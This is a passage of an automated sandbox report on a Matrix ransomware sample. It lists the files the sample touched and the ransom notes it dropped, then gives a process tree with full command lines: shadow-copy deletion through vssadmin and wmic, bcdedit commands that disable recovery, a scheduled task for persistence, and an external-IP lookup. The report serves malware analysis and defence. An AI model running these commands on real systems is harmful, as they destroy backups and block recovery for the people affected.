(x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\DUBAI-BOLD.TTF 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main.css 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ca-Es-VALENCIA.pak 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\97.0.1072.55\nacl_irt_x86_64.nexe 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ul-oob.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning.png 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_single_filetype.svg 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linessimple.dotx 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription5-ppd.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial2-ul-oob.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Unlock.White.png 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\ui-strings.js 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\s_listview_18.svg 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\#FOX_README#.rtf 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ppd.xrm-ms 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3552 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1644 vssadmin.exe 1968 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 2324 powershell.exe 2324 powershell.exe 2188 W5h2OkrD64.exe 2188 W5h2OkrD64.exe 2188 W5h2OkrD64.exe 2188 W5h2OkrD64.exe 2188 W5h2OkrD64.exe 2188 W5h2OkrD64.exe 2188 W5h2OkrD64.exe 2188 W5h2OkrD64.exe 2188 W5h2OkrD64.exe 3076 powershell.exe 3076 powershell.exe 3076 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 2188 W5h2OkrD64.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 2324 powershell.exe Token: SeDebugPrivilege 2188 W5h2OkrD64.exe Token: SeLoadDriverPrivilege 2188 W5h2OkrD64.exe Token: SeBackupPrivilege 4800 vssvc.exe Token: SeRestorePrivilege 4800 vssvc.exe Token: SeAuditPrivilege 4800 vssvc.exe Token: SeIncreaseQuotaPrivilege 2488 WMIC.exe Token: SeSecurityPrivilege 2488 WMIC.exe Token: SeTakeOwnershipPrivilege 2488 WMIC.exe Token: SeLoadDriverPrivilege 2488 WMIC.exe Token: SeSystemProfilePrivilege 2488 WMIC.exe Token: SeSystemtimePrivilege 2488 WMIC.exe Token: SeProfSingleProcessPrivilege 2488 WMIC.exe Token: SeIncBasePriorityPrivilege 2488 WMIC.exe Token: SeCreatePagefilePrivilege 2488 WMIC.exe Token: SeBackupPrivilege 2488 WMIC.exe Token: SeRestorePrivilege 2488 WMIC.exe Token: SeShutdownPrivilege 2488 WMIC.exe Token: SeDebugPrivilege 2488 WMIC.exe Token: SeSystemEnvironmentPrivilege 2488 WMIC.exe Token: SeRemoteShutdownPrivilege 2488 WMIC.exe Token: SeUndockPrivilege 2488 WMIC.exe Token: SeManageVolumePrivilege 2488 WMIC.exe Token: 33 2488 WMIC.exe Token: 34 2488 WMIC.exe Token: 35 2488 WMIC.exe Token: 36 2488 WMIC.exe Token: SeIncreaseQuotaPrivilege 2488 WMIC.exe Token: SeSecurityPrivilege 2488 WMIC.exe Token: SeTakeOwnershipPrivilege 2488 WMIC.exe Token: SeLoadDriverPrivilege 2488 WMIC.exe Token: SeSystemProfilePrivilege 2488 WMIC.exe Token: SeSystemtimePrivilege 2488 WMIC.exe Token: SeProfSingleProcessPrivilege 2488 WMIC.exe Token: SeIncBasePriorityPrivilege 2488 WMIC.exe Token: SeCreatePagefilePrivilege 2488 WMIC.exe Token: SeBackupPrivilege 2488 WMIC.exe Token: SeRestorePrivilege 2488 WMIC.exe Token: SeShutdownPrivilege 2488 WMIC.exe Token: SeDebugPrivilege 2488 WMIC.exe Token: SeSystemEnvironmentPrivilege 2488 WMIC.exe Token: SeRemoteShutdownPrivilege 2488 WMIC.exe Token: SeUndockPrivilege 2488 WMIC.exe Token: SeManageVolumePrivilege 2488 WMIC.exe Token: 33 2488 WMIC.exe Token: 34 2488 WMIC.exe Token: 35 2488 WMIC.exe Token: 36 2488 WMIC.exe Token: SeDebugPrivilege 3076 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2924 wrote to memory of 1172 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 80 PID 2924 wrote to memory of 1172 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 80 PID 2924 wrote to memory of 1172 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 80 PID 2924 wrote to memory of 1424 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 82 PID 2924 wrote to memory of 1424 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 82 PID 2924 wrote to memory of 1424 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 82 PID 2924 wrote to memory of 4880 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 84 PID 2924 wrote to memory of 4880 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 84 PID 2924 wrote to memory of 4880 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 84 PID 4880 wrote to memory of 2324 4880 cmd.exe 86 PID 4880 wrote to memory of 2324 4880 cmd.exe 86 PID 4880 wrote to memory of 2324 4880 cmd.exe 86 PID 2924 wrote to memory of 3804 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 91 PID 2924 wrote to memory of 3804 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 91 PID 2924 wrote to memory of 3804 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 91 PID 2924 wrote to memory of 356 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 94 PID 2924 wrote to memory of 356 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 94 PID 2924 wrote to memory of 356 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 94 PID 3804 wrote to memory of 4540 3804 cmd.exe 95 PID 3804 wrote to memory of 4540 3804 cmd.exe 95 PID 3804 wrote to memory of 4540 3804 cmd.exe 95 PID 356 wrote to memory of 4660 356 cmd.exe 96 PID 356 wrote to memory of 4660 356 cmd.exe 96 PID 356 wrote to memory of 4660 356 cmd.exe 96 PID 3804 wrote to memory of 4376 3804 cmd.exe 97 PID 3804 wrote to memory of 4376 3804 cmd.exe 97 PID 3804 wrote to memory of 4376 3804 cmd.exe 97 PID 2924 wrote to memory of 4320 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 98 PID 2924 wrote to memory of 4320 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 98 PID 2924 wrote to memory of 4320 2924 2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe 98 PID 3804 wrote to memory of 2488 3804 cmd.exe 100 PID 3804 wrote to memory of 2488 3804 cmd.exe 100 PID 3804 wrote to memory of 2488 3804 cmd.exe 100 PID 4660 wrote to memory of 4956 4660 wscript.exe 101 PID 4660 wrote to memory of 4956 4660 wscript.exe 101 PID 4660 wrote to memory of 4956 4660 wscript.exe 101 PID 4320 wrote to memory of 3204 4320 cmd.exe 103 PID 4320 wrote to memory of 3204 4320 cmd.exe 103 PID 4320 wrote to memory of 3204 4320 cmd.exe 103 PID 4956 wrote to memory of 3552 4956 cmd.exe 104 PID 4956 wrote to memory of 3552 4956 cmd.exe 104 PID 4956 wrote to memory of 3552 4956 cmd.exe 104 PID 4320 wrote to memory of 3528 4320 cmd.exe 107 PID 4320 wrote to memory of 3528 4320 cmd.exe 107 PID 4320 wrote to memory of 3528 4320 cmd.exe 107 PID 4660 wrote to memory of 3996 4660 wscript.exe 108 PID 4660 wrote to memory of 3996 4660 wscript.exe 108 PID 4660 wrote to memory of 3996 4660 wscript.exe 108 PID 3996 wrote to memory of 1620 3996 cmd.exe 110 PID 3996 wrote to memory of 1620 3996 cmd.exe 110 PID 3996 wrote to memory of 1620 3996 cmd.exe 110 PID 4320 wrote to memory of 3376 4320 cmd.exe 111 PID 4320 wrote to memory of 3376 4320 cmd.exe 111 PID 4320 wrote to memory of 3376 4320 cmd.exe 111 PID 4320 wrote to memory of 1332 4320 cmd.exe 113 PID 4320 wrote to memory of 1332 4320 cmd.exe 113 PID 4320 wrote to memory of 1332 4320 cmd.exe 113 PID 1332 wrote to memory of 784 1332 cmd.exe 115 PID 1332 wrote to memory of 784 1332 cmd.exe 115 PID 1332 wrote to memory of 784 1332 cmd.exe 115 PID 784 wrote to memory of 2188 784 W5h2OkrD.exe 117 PID 784 wrote to memory of 2188 784 W5h2OkrD.exe 117 PID 1236 wrote to memory of 1644 1236 cmd.exe 119 PID 1236 wrote to memory of 1644 1236 cmd.exe 119 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3204 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe"C:\Users\Admin\AppData\Local\Temp\2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe"1⤵
- Matrix Ransomware
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2a2a6e1e2b87e418cb5c601b53e18b1f2c2c5152e2dc3595f06a694c43834c21.exe" "C:\Users\Admin\AppData\Local\Temp\NWCHJTo1.exe"2⤵PID:1172
-
-
C:\Users\Admin\AppData\Local\Temp\NWCHJTo1.exe"C:\Users\Admin\AppData\Local\Temp\NWCHJTo1.exe" -n2⤵
- Executes dropped EXE
PID:1424
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\LxvYTs9V.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IUnUu6qd.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IUnUu6qd.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:4540
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:4376
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:2488
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\pI5ixat3.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:356 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\pI5ixat3.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uTrN5V4t.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\uTrN5V4t.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:3552
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1620
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xePHKt6L.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""2⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Views/modifies file attributes
PID:3204
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:3528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:3376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c W5h2OkrD.exe -accepteula "classes.jsa" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\W5h2OkrD.exeW5h2OkrD.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Users\Admin\AppData\Local\Temp\W5h2OkrD64.exeW5h2OkrD.exe -accepteula "classes.jsa" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\uTrN5V4t.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:1644
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076 -
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1968
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:1096
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3576
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:432
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4800
Network
MITRE ATT&CK Enterprise v6
Persistence
Hidden Files and Directories
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
1Modify Registry
2